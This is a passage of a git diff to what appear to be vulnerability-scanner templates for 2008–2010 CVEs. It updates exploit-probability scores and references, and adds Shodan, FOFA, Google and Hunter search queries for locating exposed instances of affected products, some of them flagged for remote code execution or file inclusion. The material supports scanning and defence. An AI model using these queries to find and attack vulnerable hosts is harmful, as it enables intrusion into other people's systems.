cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 76631b2aac..2130f00493 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -30,6 +30,8 @@ info: vendor: parallels product: h-sphere shodan-query: title:"Parallels H-Sphere + fofa-query: title="h-sphere" + google-query: intitle:"h-sphere" tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 0d5751fe14..79568e3231 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.71607 + epss-percentile: 0.72128 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 8eaf2fb274..4f4712280f 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 - epss-score: 0.01425 - epss-percentile: 0.86241 + epss-score: 0.01544 + epss-percentile: 0.87118 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,6 +26,7 @@ info: vendor: boka product: siteengine shodan-query: html:"SiteEngine" + fofa-query: body="siteengine" tags: cve,cve2008,redirect,siteengine,boka http: diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index f6f14d1199..986b065cd7 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2009-0545 cwe-id: CWE-20 epss-score: 0.97081 - epss-percentile: 0.99755 + epss-percentile: 0.99771 cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell product: zeroshell + shodan-query: http.title:"zeroshell" + fofa-query: title="zeroshell" + google-query: intitle:"zeroshell" tags: cve,cve2009,edb,zeroshell,kerbynet,rce http: diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 4c4a3f433d..52f5de7570 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-0932 cwe-id: CWE-22 epss-score: 0.04048 - epss-percentile: 0.919 + epss-percentile: 0.92091 cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index b874ede337..acd906e9bd 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -20,13 +20,17 @@ info: cvss-score: 7.5 cve-id: CVE-2009-1151 cwe-id: CWE-94 - epss-score: 0.79256 - epss-percentile: 0.98197 + epss-score: 0.79939 + epss-percentile: 0.983 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin product: phpmyadmin + shodan-query: http.title:"phpmyadmin" + fofa-query: title="phpmyadmin" + google-query: intitle:"phpmyadmin" + hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce http: diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index fdad6c137f..a1fcfebec4 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -29,6 +29,8 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2009,cve,adobe,xss,coldfusion,tenable http: diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 68f9595bb0..3ba409999f 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - epss-score: 0.00779 - epss-percentile: 0.80973 + epss-score: 0.02365 + epss-percentile: 0.89809 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 4ab40ddac3..f77378d2c4 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2009-3318 cwe-id: CWE-22 - epss-score: 0.00706 - epss-percentile: 0.79951 + epss-score: 0.01062 + epss-percentile: 0.84107 cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 303920760a..a9b7cb0a0e 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -14,18 +14,21 @@ info: - http://www.vupen.com/english/advisories/2009/1494 - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - http://www.exploit-db.com/exploits/8870 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4202 cwe-id: CWE-22 - epss-score: 0.01956 - epss-percentile: 0.87449 + epss-score: 0.01917 + epss-percentile: 0.88567 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: http.html:"joomla! - open source content management" + fofa-query: body="joomla! - open source content management" tags: cve,cve2009,joomla,lfi,photo,edb http: diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 22f0057f54..e7235dce6b 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2009-4223 cwe-id: CWE-94 epss-score: 0.00611 - epss-percentile: 0.764 + epss-percentile: 0.78606 cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index eaeb45c307..bbf1e2c67b 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -11,18 +11,20 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - http://awstats.sourceforge.net/docs/awstats_changelog.txt + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-5020 cwe-id: CWE-20 - epss-score: 0.00215 - epss-percentile: 0.59474 + epss-score: 0.00253 + epss-percentile: 0.65112 cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: awstats product: awstats + shodan-query: cpe:"cpe:2.3:a:laurent_destailleur:awstats" tags: cve2009,cve,redirect,awstats http: diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 40caec65d8..df2d6fec55 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -18,13 +18,15 @@ info: cvss-score: 7.5 cve-id: CVE-2010-0157 cwe-id: CWE-22 - epss-score: 0.00826 - epss-percentile: 0.80104 + epss-score: 0.23423 + epss-percentile: 0.96555 cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! + shodan-query: http.html:"joomla! - open source content management" + fofa-query: body="joomla! - open source content management" tags: cve2010,cve,joomla,lfi,edb,packetstorm http: diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 162fed1a75..502852583f 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -21,13 +21,14 @@ info: cve-id: CVE-2010-0219 cwe-id: CWE-255 epss-score: 0.97509 - epss-percentile: 0.99981 + epss-percentile: 0.99984 cpe: cpe:2.3:a:apache:axis2:1.3:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: axis2 shodan-query: http.html:"Apache Axis" + fofa-query: body="apache axis" tags: cve,cve2010,axis,apache,default-login,axis2 http: diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 192e0ec010..e352e67234 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0467 cwe-id: CWE-22 epss-score: 0.06955 - epss-percentile: 0.93792 + epss-percentile: 0.93927 cpe: cpe:2.3:a:chillcreations:com_ccnewsletter:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index 4619ccc6cf..38dd989db7 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0759 cwe-id: CWE-22 epss-score: 0.01569 - epss-percentile: 0.86974 + epss-percentile: 0.87232 cpe: cpe:2.3:a:greatjoomla:scriptegrator_plugin:1.4.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index f40d55c22e..16f308ded0 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0942 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:jvideodirect:com_jvideodirect:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index ed8e98f25b..76737ccb6b 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 902e5d7506..dad40d4d75 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/11511 - https://nvd.nist.gov/vuln/detail/CVE-2010-1081 - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1081 cwe-id: CWE-22 - epss-score: 0.0168 - epss-percentile: 0.8632 + epss-score: 0.37754 + epss-percentile: 0.97206 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index e805a95731..2935467205 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1305 cwe-id: CWE-22 epss-score: 0.03203 - epss-percentile: 0.90236 + epss-percentile: 0.91191 cpe: cpe:2.3:a:joomlamo:com_jinventory:1.23.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 28fd60e49b..e1db833941 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.85196 + epss-percentile: 0.85468 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 118251644b..44202e9809 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1307 - http://www.vupen.com/english/advisories/2010/0806 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57531 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86604 + epss-percentile: 0.87931 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 0910a8204d..cfc44ddf1c 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.85765 + epss-percentile: 0.86023 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 07ceab2896..c673d75218 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83338 + epss-percentile: 0.84812 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index d274284b73..7e80d29d30 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12082 - https://nvd.nist.gov/vuln/detail/CVE-2010-1313 - http://www.exploit-db.com/exploits/12082 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72402 + epss-percentile: 0.75061 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 74233ba758..5f0f38d9b7 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.87665 + epss-percentile: 0.87931 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 889e71aa9f..ca5b99d766 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73222 + epss-percentile: 0.75733 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 29f5fdfb93..d659098372 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -30,6 +30,8 @@ info: vendor: redhat product: jboss_enterprise_application_platform shodan-query: title:"JBoss" + fofa-query: title="jboss" + google-query: intitle:"jboss" tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat http: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 7cbc8e5249..9ccb1a4504 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12232 - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - http://www.exploit-db.com/exploits/12232 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73149 + epss-percentile: 0.75733 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 2412d6d079..055b6fd1e4 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.81406 + epss-percentile: 0.81755 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 343bae62dc..a37a5e8a6a 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.93171 + epss-percentile: 0.93322 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index a26d5378db..566e691bbf 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80104 + epss-percentile: 0.8192 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index ab3290bddd..d8919a69c7 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 - http://www.exploit-db.com/exploits/12182 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57662 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 0710e11ab6..931cc3a490 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90668 + epss-percentile: 0.91571 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 69adbf9bbd..879955f14d 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.01827 - epss-percentile: 0.86946 + epss-percentile: 0.88212 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index a3f6f5ad1f..d657b8093c 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.75244 + epss-percentile: 0.75733 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index a6e5e7208e..1f7465f851 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.79951 + epss-percentile: 0.80337 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 06afaa24fb..e06e190f6d 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01385 - epss-percentile: 0.86058 + epss-percentile: 0.86323 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index b1ef080b2e..6c457012db 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -13,13 +13,14 @@ info: - https://www.exploit-db.com/exploits/12151 - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 - http://www.exploit-db.com/exploits/12151 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78254 + epss-percentile: 0.80337 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 82d4d0479b..70e02b87f1 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1602 cwe-id: CWE-22 epss-score: 0.03451 - epss-percentile: 0.91267 + epss-percentile: 0.91491 cpe: cpe:2.3:a:zimbllc:com_zimbcomment:0.8.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index ba9f57adb0..35daa2bd86 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1607 cwe-id: CWE-22 epss-score: 0.01726 - epss-percentile: 0.87577 + epss-percentile: 0.87848 cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 58f4abbb84..9d241f2807 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1653 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.91355 + epss-percentile: 0.91571 cpe: cpe:2.3:a:htmlcoderhelper:com_graphics:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 9a911b9473..8aef850eec 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1657 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.87665 + epss-percentile: 0.87931 cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 19d33fcac3..72dc18f295 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1659 cwe-id: CWE-22 epss-score: 0.01806 - epss-percentile: 0.86853 + epss-percentile: 0.88135 cpe: cpe:2.3:a:webkul:com_ultimateportfolio:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 91ec26c65c..9288a4e941 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -12,13 +12,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-1715 - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57677 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1715 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83996 + epss-percentile: 0.85468 cpe: cpe:2.3:a:pucit.edu:com_onlineexam:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 709a568761..34fe12b934 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1718 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.81565 + epss-percentile: 0.8192 cpe: cpe:2.3:a:lispeltuut:com_archeryscores:1.0.6:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index a0435899d9..9970e98d4a 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2010-1723 cwe-id: CWE-22 epss-score: 0.01956 - epss-percentile: 0.87487 + epss-percentile: 0.88678 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_drawroot:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 64875ad48b..79558d6a05 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache http: diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index bf0c409599..07b578d433 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1952 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.85196 + epss-percentile: 0.85468 cpe: cpe:2.3:a:cmstactics:com_beeheard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1953.yaml 